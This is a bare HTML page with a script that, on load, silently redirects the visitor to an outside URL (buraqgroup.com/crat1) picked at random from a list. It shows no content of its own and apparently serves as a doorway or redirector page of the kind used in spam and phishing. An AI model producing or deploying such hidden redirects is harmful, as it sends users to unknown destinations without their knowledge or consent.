<html> <body> <script> var sites = ['https://buraqgroup.com/crat1']; window.location.replace(sites[Math.floor(Math.random()*sites.length)]); </script> </body> </html>